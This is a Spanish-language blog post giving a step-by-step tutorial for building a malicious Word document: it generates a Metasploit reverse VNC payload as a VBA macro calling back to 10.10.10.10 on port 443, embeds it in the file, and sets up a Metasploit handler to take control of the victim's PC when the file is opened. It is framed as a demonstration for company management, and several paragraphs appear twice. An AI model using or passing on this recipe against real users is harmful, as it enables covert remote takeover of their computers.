A la hora de demostrar falencias de seguridad por parte de los usuarios, una de las pruebas de concepto más simples y efectivas que podemos realizar es la de incluir un payload de MetaSploit dentro de un archivo Word.
En tres simples pasos, vamos a generar un payload de MetaSploit como una macro de visual basic, luego vamos a embeber esta macro en un archivo Word, y finalmente vamos a dejar escuchando por la conexión reversa que se va a realizar cuando la víctima abra el archivo.
En tres simples pasos, vamos a generar un payload de MetaSploit como una macro de visual basic, luego vamos a embeber esta macro en un archivo Word, y finalmente vamos a dejar escuchando por la conexión reversa que se va a realizar cuando la víctima abra el archivo.
1. Generamos el Paylaod
Seleccionamos como payload una conexión reversa de VNC, que se conectará a la IP "10.10.10.10" en el puerto "443":
./msfpayload windows/vncinject/reverse_tcp LHOST=10.10.10.10 LPORT=443 V > payload.bas
No es necesario que la víctima tenga instalado un servidor de VNC, pero si que el atacante tenga el vncviewer instalado. Si no lo tiene: "apt-get install vncviewer".
2. Embebemos la Macro
Debemos separar al archivo payload.bas en dos partes que están claramente divididos dentro del mismo, por un lado el código de la macro y por el otro los datos del payload.
Primero vamos a "Herramientas -> Macro -> Editor de Visual Basic". Luego vamos a "Archivo -> Importar Archivo" y allí seleccionamos el archivo que previamente dividimos con el código de la macro.
Primero vamos a "Herramientas -> Macro -> Editor de Visual Basic". Luego vamos a "Archivo -> Importar Archivo" y allí seleccionamos el archivo que previamente dividimos con el código de la macro.
Si queremos verificar que el código de la macro se cargo correctamente, vamos al menú de la izquierda, y en la carpeta "Módulos" deberías poder encontrar "Módulo 1" con nuestro código. Al darle doble click a "Modulo 1" aparecerá el código cargado.
Cerramos el "Editor de Visual Basic", y al final del contenido de Word, copiamos los datos del payload.
Cerramos el "Editor de Visual Basic", y al final del contenido de Word, copiamos los datos del payload.
3. Escuchamos la Conexión Reversa
Finalmente dejamos escuchando por la conexión reversa de VNC que se va a crear cuando la víctima abra el archivo de Word.
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=10.10.10.10 LPORT=443 E
Si no queremos que se abra la Shell de Cortesía de Metasploit, que es una consola de DOS de color azul, debemos agregar esto a lo anterior: "DisableCourtesyShell=True"
Para finalizar, en un ataque real nadie va a utilizar VNC como payload porque obviamente la víctima podrá ver que tenemos control de su PC, pero por otro lado esto es muy efectivo para hacer demostraciones prácticas a la gerencia de una compañía ;-)
Para finalizar, en un ataque real nadie va a utilizar VNC como payload porque obviamente la víctima podrá ver que tenemos control de su PC, pero por otro lado esto es muy efectivo para hacer demostraciones prácticas a la gerencia de una compañía ;-)
Publicado por Leonardo Pigñer en www.KUNGFOOSION.com
No hay comentarios.:
Publicar un comentario